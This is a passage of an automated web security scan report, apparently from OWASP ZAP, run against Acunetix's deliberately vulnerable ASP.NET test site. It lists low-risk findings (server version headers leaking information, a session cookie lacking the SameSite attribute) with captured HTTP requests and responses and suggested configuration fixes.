Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (6567 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 22784
Response body (22784 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (456 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Content-Length: 10985
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (10985 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 30486
Response body (30486 bytes)
abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Content-Length: 3761
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (3761 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 17924
Response body (17924 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Signup.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (399 bytes)
POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/Signup.aspx
Content-Length: 1098
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1098 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 13177
Response body (13177 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
Risk=Low, Confidence=Medium (99)
http://testaspnet.vulnweb.com (99)
Cookie without SameSite Attribute (2)
GET http://testaspnet.vulnweb.com
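Alert tags
Alert description A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective countermeasure to cross-site request forgery, cross-site script inclusion, and timing attacks.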
Request Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:16 GMT
Content-Length: 13912
Response body (13912 bytes)
Parameter ASP.NET_SessionId
Evidence Set-Cookie: ASP.NET_SessionId
Solution Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
GET http://testaspnet.vulnweb.com/
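Alert tags
Alert description A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective countermeasure to cross-site request forgery, cross-site script inclusion, and timing attacks.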
Request Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:15 GMT
Content-Length: 13912
Response body (13912 bytes)
style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter ASP.NET_SessionIdEvidence Set-Cookie: ASP.NET_SessionIdSolution Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.
-
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) (38)
GET http://testaspnet.vulnweb.com
Alert tags
Alert description The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request
Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:16 GMT
Content-Length: 13912
Response body (13912 bytes)
Evidence X-Powered-By: ASP.NET
Solution Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
GET http://testaspnet.vulnweb.com/
Alert tags
Alert description The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request
Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Request body (0 bytes)
Response
Status line and header section (296 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:15 GMT
Content-Length: 13912
Response body (13912 bytes)
Evidence X-Powered-By: ASP.NET
Solution Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 14467
Response body (14467 bytes)
Evidence
X-Powered-By: ASP.NET
Solution
Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
GET http://testaspnet.vulnweb.com/ads/acunetix.gif
Alert tags
Alert description
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request
Request line and header section (333 bytes)
GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/ads/def.html
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (247 bytes)
HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 29 May 2008 14:36:52 GMT
Accept-Ranges: bytes
ETag: "eb3686f99c1c81:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 3048
Response body (3048 bytes)
ZAP